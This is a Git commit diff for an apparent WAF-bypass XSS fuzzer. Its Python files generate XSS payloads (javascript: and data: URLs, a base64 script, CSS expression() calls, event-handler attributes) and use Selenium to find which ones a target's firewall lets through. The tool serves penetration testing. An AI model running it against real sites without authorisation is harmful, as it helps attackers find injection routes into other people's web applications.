dzonerzy/xzzuf
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Compare commits

base: dzonerzy:dbc39fee5b8d194e92bbf1326c05e475bee77575
Branches Tags
dzonerzy:main
dzonerzy:dl-dev
dzonerzy:neg-dev
...
compare: dzonerzy:a6c0c62cc96b70f39e885069ebc9eaaa3a3f6fdc
Branches Tags
dzonerzy:dl-dev
dzonerzy:neg-dev
dzonerzy:main

3 Commits
dbc39fee5b ... a6c0c62cc9

Author SHA1 Message Date
negentropy
a6c0c62cc9 Merge branch 'dl-dev' into neg-dev 
merge branch dl-dev in neg-dev per allineamento codice
 2023-10-25 11:52:55 +02:00
Daniele Linguaglossa
196ffdcd4f completed tag class def 2023-10-25 11:25:41 +02:00
Daniele Linguaglossa
9e0ea55f29 added some stuff 2023-10-24 17:49:07 +02:00
5 changed files with 461 additions and 22 deletions
Show Stats Expand all files Collapse all files

1
.gitignore vendored
View File

@ -1,2 +1,3 @@
venv venv
chromedriver* chromedriver*
__pycache__/

64
language.py Normal file
View File

@ -0,0 +1,64 @@
from language_utils import gen_boolean, gen_color, gen_date, gen_email, gen_javascript, gen_number, gen_style, gen_text, gen_url
class HTMLTag:
def __init__(self, name, self_closing=False):
self.name = name
self.self_closing = self_closing
self.attributes = []
self.children = []
def __str__(self) -> str:
tag = ""
if self.self_closing:
tag = f"<{self.name} "
for attr in self.attributes:
tag += f"{attr} "
tag += "/>"
else:
tag = f"<{self.name}"
for attr in self.attributes:
tag += f"{attr} "
tag += ">"
for child in self.children:
tag += f"{child}"
tag += f"</{self.name}>"
return tag
class HTMLTagAttributeType:
TypeText = 0
TypeBoolean = 1
TypeNumber = 2
TypeColor = 3
TypeJavascript = 4
TypeStlye = 5
TypeURL = 6
TypeEmail = 7
TypeDate = 8
Generators = {
HTMLTagAttributeType.TypeText: gen_text,
HTMLTagAttributeType.TypeBoolean: gen_boolean,
HTMLTagAttributeType.TypeNumber: gen_number,
HTMLTagAttributeType.TypeColor: gen_color,
HTMLTagAttributeType.TypeJavascript: gen_javascript,
HTMLTagAttributeType.TypeStlye: gen_style,
HTMLTagAttributeType.TypeURL: gen_url,
HTMLTagAttributeType.TypeEmail: gen_email,
HTMLTagAttributeType.TypeDate: gen_date,
}
class HTMLAttribute:
def __init__(self, name, value_type):
self.name = name
self.kind = value_type
self.value = Generators[value_type]()
def __str__(self) -> str:
if not self.value:
return self.name
else:
return f'{self.name}="{self.value}"'

122
language_utils.py Normal file
View File

@ -0,0 +1,122 @@
from random import randint
def gen_text():
cases = {
0: lambda: 'alert(0)',
1: lambda: 'prompt\x600\x60',
2: lambda: '"confirm\x600\x60"',
3: lambda: 'window["alert"](0)',
4: lambda: 'window["prompt"](0)',
5: lambda: 'window["confirm"](0)',
6: lambda: '"alert\x600\x60"',
7: lambda: '"prompt\x600\x60"',
8: lambda: '"alert(1)"',
}
return cases[randint(0, 8)]()
def gen_boolean():
cases = {
0: lambda: 'true',
1: lambda: 'false',
2: lambda: '1',
3: lambda: '0',
4: lambda: 'null',
5: lambda: 'undefined',
6: lambda: '""',
7: lambda: '[]',
8: lambda: '{}',
}
return cases[randint(0, 8)]()
def gen_number():
cases = {
0: lambda: '0',
1: lambda: '1',
2: lambda: '0.1',
3: lambda: '1.1',
4: lambda: '0x1',
5: lambda: '0b1',
6: lambda: '0o1',
7: lambda: '1e1',
8: lambda: '1e-1',
}
return cases[randint(0, 8)]()
def gen_color():
cases = {
0: lambda: '#000000',
1: lambda: '#ffffff',
2: lambda: '#ff0000',
3: lambda: '#00ff00',
4: lambda: '#0000ff',
5: lambda: '#ffff00',
6: lambda: '#00ffff',
7: lambda: '#ff00ff',
8: lambda: '#c0c0c0',
}
return cases[randint(0, 8)]()
def gen_javascript():
cases = {
0: lambda: 'alert(0)',
1: lambda: 'prompt\x600\x60',
2: lambda: '"confirm\x600\x60"',
3: lambda: 'window["alert"](0)',
4: lambda: 'window["prompt"](0)',
5: lambda: 'window["confirm"](0)',
6: lambda: '"alert\x600\x60"',
7: lambda: '"prompt\x600\x60"',
8: lambda: '"alert(1)"',
9: lambda: 'console.log(alert(1))//',
10: lambda: 'console.log(alert(1))/*',
11: lambda: '{1:alert(1)}',
}
return cases[randint(0, 11)]()
def gen_style():
# xss via style
cases = {
0: lambda: 'background-image:url("javascript:alert(1)")',
1: lambda: 'expression(alert(1))',
2: lambda: 'expression\x600\x60',
}
return cases[randint(0, 2)]()
def gen_url():
# xss via url
cases = {
0: lambda: 'javascript:alert(1)',
1: lambda: 'data:text/html,<script>alert(1)</script>',
2: lambda: 'data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==',
3: lambda: 'data:text/html,<script>alert\x600\x60</script>',
}
return cases[randint(0, 3)]()
def gen_email():
# xss via email
cases = {
0: lambda: '@javascript:alert(1)',
1: lambda: 'javascript:alert(1)@',
2: lambda: '@javascript:alert\x600\x60',
}
return cases[randint(0, 3)]()
def gen_date():
return ''

248
tags.py Normal file
View File

@ -0,0 +1,248 @@
from language import HTMLAttribute, HTMLTag, HTMLTagAttributeType
Tags = [
HTMLTag('a', self_closing=False),
HTMLTag('abbr', self_closing=False),
HTMLTag('acronym', self_closing=False),
HTMLTag('address', self_closing=False),
HTMLTag('applet', self_closing=False),
HTMLTag('area', self_closing=True),
HTMLTag('article', self_closing=False),
HTMLTag('aside', self_closing=False),
HTMLTag('audio', self_closing=False),
HTMLTag('b', self_closing=False),
HTMLTag('base', self_closing=True),
HTMLTag('basefont', self_closing=False),
HTMLTag('bdi', self_closing=False),
HTMLTag('bdo', self_closing=False),
HTMLTag('big', self_closing=False),
HTMLTag('blockquote', self_closing=False),
HTMLTag('body', self_closing=False),
HTMLTag('br', self_closing=True),
HTMLTag('button', self_closing=False),
HTMLTag('canvas', self_closing=False),
HTMLTag('caption', self_closing=False),
HTMLTag('center', self_closing=False),
HTMLTag('cite', self_closing=False),
HTMLTag('code', self_closing=False),
HTMLTag('col', self_closing=True),
HTMLTag('colgroup', self_closing=False),
HTMLTag('data', self_closing=False),
HTMLTag('datalist', self_closing=False),
HTMLTag('dd', self_closing=False),
HTMLTag('del', self_closing=False),
HTMLTag('details', self_closing=False),
HTMLTag('dfn', self_closing=False),
HTMLTag('dialog', self_closing=False),
HTMLTag('dir', self_closing=False),
HTMLTag('div', self_closing=False),
HTMLTag('dl', self_closing=False),
HTMLTag('dt', self_closing=False),
HTMLTag('em', self_closing=False),
HTMLTag('embed', self_closing=True),
HTMLTag('fieldset', self_closing=False),
HTMLTag('figcaption', self_closing=False),
HTMLTag('figure', self_closing=False),
HTMLTag('font', self_closing=False),
HTMLTag('footer', self_closing=False),
HTMLTag('form', self_closing=False),
HTMLTag('frame', self_closing=True),
HTMLTag('frameset', self_closing=False),
HTMLTag('h1', self_closing=False),
HTMLTag('h2', self_closing=False),
HTMLTag('h3', self_closing=False),
HTMLTag('h4', self_closing=False),
HTMLTag('h5', self_closing=False),
HTMLTag('h6', self_closing=False),
HTMLTag('head', self_closing=False),
HTMLTag('header', self_closing=False),
HTMLTag('hr', self_closing=True),
HTMLTag('html', self_closing=False),
HTMLTag('i', self_closing=False),
HTMLTag('iframe', self_closing=False),
HTMLTag('img', self_closing=True),
HTMLTag('input', self_closing=True),
HTMLTag('ins', self_closing=False),
HTMLTag('kbd', self_closing=False),
HTMLTag('label', self_closing=False),
HTMLTag('legend', self_closing=False),
HTMLTag('li', self_closing=False),
HTMLTag('link', self_closing=True),
HTMLTag('main', self_closing=False),
HTMLTag('map', self_closing=False),
HTMLTag('mark', self_closing=False),
HTMLTag('meta', self_closing=True),
HTMLTag('meter', self_closing=False),
HTMLTag('nav', self_closing=False),
HTMLTag('noframes', self_closing=False),
HTMLTag('noscript', self_closing=False),
HTMLTag('object', self_closing=False),
HTMLTag('ol', self_closing=False),
HTMLTag('optgroup', self_closing=False),
HTMLTag('option', self_closing=False),
HTMLTag('output', self_closing=False),
HTMLTag('p', self_closing=False),
HTMLTag('param', self_closing=True),
HTMLTag('picture', self_closing=False),
HTMLTag('pre', self_closing=False),
HTMLTag('progress', self_closing=False),
HTMLTag('q', self_closing=False),
HTMLTag('rp', self_closing=False),
HTMLTag('rt', self_closing=False),
HTMLTag('ruby', self_closing=False),
HTMLTag('s', self_closing=False),
HTMLTag('samp', self_closing=False),
HTMLTag('script', self_closing=False),
HTMLTag('section', self_closing=False),
HTMLTag('select', self_closing=False),
HTMLTag('small', self_closing=False),
HTMLTag('source', self_closing=True),
HTMLTag('span', self_closing=False),
HTMLTag('strike', self_closing=False),
HTMLTag('strong', self_closing=False),
HTMLTag('style', self_closing=False),
HTMLTag('sub', self_closing=False),
HTMLTag('summary', self_closing=False),
HTMLTag('sup', self_closing=False),
HTMLTag('svg', self_closing=False),
HTMLTag('table', self_closing=False),
HTMLTag('tbody', self_closing=False),
HTMLTag('td', self_closing=False),
HTMLTag('template', self_closing=False),
HTMLTag('textarea', self_closing=False),
HTMLTag('tfoot', self_closing=False),
HTMLTag('th', self_closing=False),
HTMLTag('thead', self_closing=False),
HTMLTag('time', self_closing=False),
HTMLTag('title', self_closing=False),
HTMLTag('tr', self_closing=False),
HTMLTag('track', self_closing=True),
HTMLTag('tt', self_closing=False),
HTMLTag('u', self_closing=False),
HTMLTag('ul', self_closing=False),
HTMLTag('var', self_closing=False),
HTMLTag('video', self_closing=False),
HTMLTag('wbr', self_closing=True),
HTMLTag('xmp', self_closing=False),
]
Attributes = [
# events
HTMLAttribute('onafterprint', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onafterscriptexecute', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onanimationcancel', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onanimationend', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onanimationiteration', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onanimationstart', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onauxclick', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbeforecopy', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbeforecut', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbeforeinput', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbeforeprint', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbeforescriptexecute',
HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbeforetoggle', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbeforeunload', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbegin', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onblur', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onbounce', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oncanplay', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oncanplaythrough', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onchange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onclick', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onclose', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oncontextmenu', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oncopy', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oncuechange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oncut', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondblclick', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondrag', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondragend', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondragenter', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondragleave', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondragover', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondragstart', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondrop', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ondurationchange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onend', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onended', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onerror', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onfinish', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onfocus', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onfocusin', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onfocusout', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onfullscreenchange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onhashchange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oninput', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('oninvalid', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onkeydown', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onkeypress', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onkeyup', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onload', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onloadeddata', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onloadedmetadata', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmessage', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmousedown', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmouseenter', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmouseleave', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmousemove', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmouseout', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmouseover', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmouseup', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmousewheel', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onmozfullscreenchange',
HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpagehide', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpageshow', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpaste', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpause', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onplay', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onplaying', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointerdown', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointerenter', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointerleave', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointermove', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointerout', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointerover', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointerrawupdate', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpointerup', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onpopstate', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onprogress', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onratechange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onrepeat', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onreset', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onresize', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onscroll', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onscrollend', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onsearch', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onseeked', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onseeking', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onselect', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onselectionchange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onselectstart', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onshow', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onstart', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onsubmit', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontimeupdate', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontoggle', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontoggle(popover)', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontouchend', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontouchmove', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontouchstart', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontransitioncancel', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontransitionend', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontransitionrun', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('ontransitionstart', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onunhandledrejection', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onunload', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onvolumechange', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onwebkitanimationend', HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onwebkitanimationiteration',
HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onwebkitanimationstart',
HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onwebkittransitionend',
HTMLTagAttributeType.TypeJavascript),
HTMLAttribute('onwheel', HTMLTagAttributeType.TypeJavascript),
]

46
xzzuf.py
View File

@ -6,7 +6,19 @@ from selenium.webdriver.support.ui import WebDriverWait
from urllib.parse import urlparse from urllib.parse import urlparse
from urllib.parse import urlencode from urllib.parse import urlencode
from tags import Attributes
# WAFBypass class # WAFBypass class
from language import HTMLTag, HTMLAttribute, HTMLTagAttributeType
t = HTMLTag("form")
i = HTMLTag("input", self_closing=True)
i.attributes.append(HTMLAttribute("type", HTMLTagAttributeType.TypeText))
t.children.append(i)
print(t)
class WAFBypass(): class WAFBypass():
code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}" code = "window.alert_trigger = false;window.alert = function() {window.alert_trigger = true;}"
@ -52,35 +64,27 @@ class WAFBypass():
self.driver.get(url) self.driver.get(url)
self.wait_for_pageload() self.wait_for_pageload()
bypass = False is403 = False
if self.is_403: if self.is_403:
bypass = False is403 = True
else: else:
bypass = True is403 = False
bypass = bypass and self.triggered_xss triggerxss = self.triggered_xss
return bypass return (is403, triggerxss)
def run_fuzz(self): def run_fuzz(self):
payloads = [
"<svg{FUZZ}onload=alert(0)>",
"<svg\{FUZZ}onload=alert(0)>",
"\u202e<img src=0 alert=x ''!=//{FUZZ}onerror=alert(0)\na>",
"""<<!--scrip<scrip --><\nscrip t="<img\nonerror{FUZZ}="alert(0)//"/ src="x" script/>alert(0)<script=/>""",
]
try: try:
for i in range(0, 0x10FFFF): for attr in Attributes:
for p in payloads: # print(f"[*] Testing {attr.name} attribute {attr}")
encoded = urlencode( encoded = urlencode({"param2": f"{attr}"})
{"param2": p.replace("{FUZZ}", chr(i))}) url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}"
print("Trying payload: ", encoded, f"({hex(i)}/0xffff)") # print(url)
url = f"{self.url.scheme}://{self.url.netloc}/?{encoded}" is403, trigger = self.navigate(url)
bypassed = self.navigate(url) if not is403:
if bypassed: print(f"[+] {attr.name} attribute is not filtered")
print("Bypassed with payload: ", encoded)
break
except KeyboardInterrupt: except KeyboardInterrupt:
self.driver.close() self.driver.close()
exit(0) exit(0)